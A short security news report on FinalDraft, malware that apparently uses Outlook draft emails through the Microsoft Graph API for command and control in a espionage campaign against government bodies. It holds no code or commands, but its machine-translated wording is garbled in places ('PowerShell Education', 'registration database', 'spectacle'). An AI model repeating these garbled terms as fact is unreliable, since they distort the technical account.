- Security researchers see new piece of malware called final draft
- It gets commands from a prepared e -mail
- It can exfiltrate data, run Powershell and more
CyberSecurity scientists from Elastic Security Labs have discovered a new piece of malware that abuses draft e -mail messages in Outlook for Data Exfiltration, PowerShell Education and more.
Malware is part of a wider tool set used in a campaign called Ref7707, which is aimed at government organizations in South America and Southeast Asia.
According to the researchers, the tool set includes a few tools: a loader called Pathloader, malware called final draft and more tools after expoating.
Accelerates
The attack starts with the victim somehow exposed to the loader. While the researchers do not detail how it happens, it is safe to assume the usual channels: phishing, social engineering, fake cracks for commercial software and the like.
Loader installs final draft that establishes a communication channel through Microsoft Graph API. It does this by using Outlook -e -Mail drafts. It continues to receive an oauth token from Microsoft using an update token embedded in its configuration. It stores it in the Windows registration database, allowing cyber criminals to be sustained access to the compromised ending point.
Malware allows attackers to perform a whole range of commands, including Exfiltrating Sensitive Data, create hidden network tunnels, manipulate local files, perform Powershell and more. After performing these commands, Malware deletes them and makes analysis even more difficult.
The researchers found malware on a computer belonging to a Foreign Ministry in South America. However, after analyzing its infrastructure, Elastic has also seen links to victims in Southeast Asia. The campaign is targeted at both Windows and Linux devices.
The attack was not linked to any known threat players, so we do not know if this was a state -sponsored spectacle or not. Given that the goal seems to be espionage, it is safe to take on nation -state attacks. In-depth analysis, including detection mechanisms, mackets and yara rules, can be found at this link.
